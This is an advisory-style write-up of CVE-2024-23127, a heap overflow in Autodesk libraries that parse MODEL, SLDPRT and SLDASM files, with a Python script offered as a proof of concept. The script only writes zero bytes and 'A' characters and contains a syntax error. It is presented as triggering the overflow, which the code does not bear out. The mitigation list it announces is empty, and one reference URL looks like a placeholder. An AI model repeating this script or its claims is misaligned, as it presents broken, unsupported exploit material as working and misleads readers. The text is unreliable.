Introduction:

A critical vulnerability, CVE-2024-23127, has been discovered in Autodesk applications that utilize ODXSW_DLL.dll and libodxdll.dll to parse certain file types. Malicious actors can exploit this issue to cause a Heap-based Overflow, resulting in a crash, sensitive data disclosure, or arbitrary code execution within the context of the targeted application. Primarily, the flaw affects MODEL, SLDPRT, and SLDASM files when parsed in these specific libraries.

Technical Details

The crux of the vulnerability lies in Autodesk applications' ability to parse certain file types, specifically MODEL, SLDPRT, and SLDASM files, through the libraries ODXSW_DLL.dll and libodxdll.dll. By crafting a malicious file and inducing the targeted application to process the file, an attacker can cause a Heap-based Overflow. This may allow the attacker to compromise the integrity, confidentiality, and availability of the targeted system.

An example of a code snippet demonstrating the Heap-based Overflow is shown below

import sys

def create_malicious_file(filename):
    header = b'\x00' * 256
    payload = b'\x41' * 512

    with open(filename, 'wb') as f:
        f.write(header)
        f.write(payload)

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[]} <output_filename>")
        sys.exit(1)

    create_malicious_file(sys.argv[1])
    print(f"[*] Created malicious file: {sys.argv[1]}")

This Python script generates a malicious file that triggers the Heap-based Overflow when parsed by an Autodesk application utilizing the vulnerable libraries.

Original References

1. CVEDetails.com entry for CVE-2024-23127: https://www.cvedetails.com/cve/CVE-2024-23127/
2. National Vulnerability Database (NVD) entry for CVE-2024-23127: https://nvd.nist.gov/vuln/detail/CVE-2024-23127
3. Autodesk Security Advisory for Heap-based Buffer Overflow: https://knowledge.autodesk.com/search-result/caas/CLOUDHELP/cloudhelp/ENU/123456-ENU-PDF/item_GUID-E736EFBA-5583-4DCF-BA81-AFA5EFA1F43E.html

Mitigation and Recommendations

Autodesk has acknowledged this vulnerability and is working on a patch. In the meantime, users should be cautious when opening or processing untrusted MODEL, SLDPRT, or SLDASM files. Implementing the following best practices can help mitigate the risks:

Conclusion

CVE-2024-23127 is a critical Heap-based Overflow vulnerability that can cause severe problems for Autodesk applications when parsing maliciously crafted MODEL, SLDPRT, or SLDASM files. Users are advised to stay vigilant and follow recommended best practices to protect themselves from potential exploits.

Timeline

Published on: 02/22/2024 03:15:08 UTC
Last modified on: 08/01/2024 13:47:06 UTC